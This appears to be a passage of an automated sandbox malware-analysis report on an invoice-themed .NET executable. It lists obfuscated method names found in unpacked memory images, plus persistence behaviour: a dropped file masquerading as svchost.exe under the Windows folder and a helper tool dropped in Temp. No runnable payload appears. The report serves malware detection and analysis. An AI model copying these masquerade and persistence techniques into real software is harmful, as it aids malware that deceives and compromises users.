        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0346D6F0 push 000000C3h; ret 5_2_0346D728
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04E0F0D4 push 850FD83Bh; ret 5_2_04E0F0D9
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 12_2_06C257F0 pushfd ; ret 12_2_06C257F1
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeCode function: 19_2_00AC57F0 pushfd ; ret 19_2_00AC57F1
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 0.0.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 12.2.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 12.0.svchost.exe.a80000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 19.2.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.csHigh entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'

        Persistence and Installation Behavior:

        barindex
        Drops PE files with benign system namesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeJump to dropped file
        Drops executables to the windows directory (C:\Windows) and starts themShow sources
        Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeJump to dropped file
